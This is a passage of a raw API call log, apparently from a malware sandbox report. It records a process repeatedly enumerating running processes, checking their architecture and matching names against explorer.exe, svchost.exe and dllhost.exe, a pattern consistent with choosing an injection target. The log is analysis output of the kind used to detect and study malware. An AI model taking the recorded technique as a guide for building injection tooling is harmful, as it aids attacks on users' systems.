hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0259.679] CloseHandle (hObject=0xec) returned 1 [0259.679] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0259.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0259.679] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0259.679] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0259.679] CloseHandle (hObject=0xec) returned 1 [0259.679] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0259.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0259.680] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0259.680] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0259.680] CloseHandle (hObject=0xec) returned 1 [0259.680] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0259.680] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0259.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0259.681] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0259.681] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0259.681] CloseHandle (hObject=0xec) returned 1 [0259.681] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0259.681] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0259.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0259.682] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0259.682] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0259.682] CloseHandle (hObject=0xec) returned 1 [0259.682] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0259.682] CloseHandle (hObject=0xe8) returned 1 [0259.682] Sleep (dwMilliseconds=0x3e8) [0260.685] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0260.686] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0260.687] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0260.687] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0260.687] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0260.687] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0260.688] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0260.688] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0260.688] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0260.688] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0260.689] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0260.689] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0260.689] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0260.689] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0260.690] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0260.690] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0260.690] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0260.690] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0260.691] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0260.691] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0260.691] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0260.691] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.692] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0260.692] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.692] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0260.692] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.693] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0260.693] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.693] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0260.693] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.694] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0260.694] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0260.694] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0260.694] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.695] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0260.695] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.695] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0260.695] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0260.695] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0260.696] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0260.696] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0260.696] CloseHandle (hObject=0xec) returned 1 [0260.696] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0260.696] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0260.696] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0260.697] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0260.697] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0260.697] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0260.697] CloseHandle (hObject=0xec) returned 1 [0260.697] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.697] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0260.697] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0260.698] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0260.698] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0260.698] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0260.698] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0260.698] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0260.698] CloseHandle (hObject=0xec) returned 1 [0260.698] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0260.698] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0260.698] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0260.698] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0260.699] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0260.699] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0260.699] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0260.699] CloseHandle (hObject=0xec) returned 1 [0260.699] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0260.699] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0260.699] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0260.699] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0260.700] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0260.700] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0260.700] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0260.700] CloseHandle (hObject=0xec) returned 1 [0260.700] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0260.700] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0260.700] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0260.700] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0260.701] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0260.701] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0260.701] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0260.701] CloseHandle (hObject=0xec) returned 1 [0260.701] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0260.701] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0260.701] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0260.701] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0260.701] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0260.701] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0260.701] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0260.701] CloseHandle (hObject=0xec) returned 1 [0260.702] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0260.702] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0260.702] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0260.702] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0260.702] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0260.702] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0260.702] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0260.702] CloseHandle (hObject=0xec) returned 1 [0260.702] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0260.702] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0260.702] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0260.702] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0260.703] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0260.703] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0260.703] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0260.703] CloseHandle (hObject=0xec) returned 1 [0260.703] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0260.703] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0260.703] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0260.703] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0260.703] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0260.703] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0260.703] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0260.703] CloseHandle (hObject=0xec) returned 1 [0260.704] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0260.704] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0260.704] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0260.704] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0260.704] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0260.704] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0260.704] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0260.704] CloseHandle (hObject=0xec) returned 1 [0260.704] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0260.704] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0260.704] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0260.704] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0260.705] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0260.705] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0260.705] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0260.705] CloseHandle (hObject=0xec) returned 1 [0260.705] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0260.705] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0260.705] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0260.705] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0260.705] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0260.705] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0260.705] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0260.706] CloseHandle (hObject=0xec) returned 1 [0260.706] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0260.706] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0260.706] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0260.706] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0260.706] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0260.706] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0260.706] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0260.706] CloseHandle (hObject=0xec) returned 1 [0260.706] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0260.706] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0260.706] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0260.706] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0260.707] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0260.707] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0260.707] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0260.707] CloseHandle (hObject=0xec) returned 1 [0260.707] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0260.707] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0260.707] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0260.707] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0260.707] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0260.707] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0260.708] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0260.708] CloseHandle (hObject=0xec) returned 1 [0260.708] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0260.708] lstrcmpiA 